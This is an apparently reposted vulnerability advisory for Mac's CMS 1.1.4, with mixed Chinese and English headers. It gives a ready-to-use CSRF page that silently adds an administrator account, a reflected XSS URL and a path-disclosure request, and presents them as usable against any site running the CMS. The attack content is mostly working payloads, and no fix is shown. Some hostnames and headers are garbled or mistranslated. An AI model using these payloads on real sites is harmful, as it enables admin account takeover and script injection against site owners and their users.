############ # 标题: Mac's CMS - Multiple vilnerabilities # 作者: Yashar shahinzadeh # 开发者网站: http://macs-framework.sourceforge.net/ # 测试环境: Linux & Windows, PHP 5.3.4 # 影响版本: 1.1.4 ################### 摘要: ======== 1. CSRF - Adding/Editing administrator account 2. Cross site scripting 3. Local path disclosure 1. CSRF - 添加修改管理员账户 =============================================== Following exploits can be used against any site installed "Mac's CMS", after a successful attack a text containing "User: yashar was added successfully. Click Here to update your view" will be appeared. I only illustrate the adding user, editing is similar. < html > <body onload="submitForm()"> <form name="myForm" id="myForm" action="http:// HdhCmsTest2cto测试数据 /index.php/main/cms/saveUser" method="post"> <input type="hidden" name="ajaxRequest" value="true"> <input type="hidden" name="username" value="yashar"> <input type="hidden" name="password" value="yashar"> <input type="hidden" name="confirmPassword" value="yashar"> <input type="hidden" name="emailAddress" value="y.shahinzadeh@gmail测试数据"> <input type="hidden" name="roleId" value="1"> </form> <script type='text/javascript'>document.myForm.submit();</script> </html> 2. Cross site scripting: ======================== There are too many XSS (Reflected and stored) in this CMS, I will provide an live example: http://server/libs/standalone/whois/example.php/%22%3E%3Cscript%3Ealert%28%27123%27%29%3C/script%3E 3. 本地文件泄露: ========================= There are some pages that are big leads to knowing local path, the path is valuable and can be used in Injection and... I would give an instance only: http://server/index.php/main/cms/getComments/?controller=main&function=index&pageIndex[$test]=1&paginationKey=comments /** Yasshar shahinzadeh **/
查看更多关于Mac's CMS 1.1.4多个缺陷及修复 - 网站安全 - 自学的详细内容...